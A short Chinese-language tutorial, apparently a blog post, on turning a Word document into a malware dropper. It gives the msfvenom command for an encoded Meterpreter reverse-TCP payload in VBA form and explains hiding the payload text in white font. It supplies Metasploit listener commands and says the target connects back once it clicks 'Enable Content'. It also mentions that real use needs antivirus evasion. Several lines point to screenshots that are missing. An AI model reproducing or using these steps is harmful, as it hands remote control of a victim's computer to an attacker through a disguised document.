1.生成我们的vba代码
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe
执行完成后会生成两段代码,第一段代码是 MACRO CODE 宏代码。
从这里开始:
到这里结束:
第二段代码:payload
从红框开始下面的都是
2.打开Office对宏的支持
在word选项中的自定义功能区中点击对开发工具的支持,我的是默认开启的。
随便找一个word文件
(操作的时候要关闭杀毒软件,实际情景中要做免杀的)
ctrl +s保存
把我们的第二段添加到word文档正文里面
这里显示这么多的异常字符,我们可以把字体设置为白色,这样看上去就正常了
把文件另存为
(注意格式为启用宏的word文档)
3.启动MSF监听
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.59.134 set lport 4444 run
4.双击打开我们制作好的文档
当目标点击 启用内容 的选型后就会上线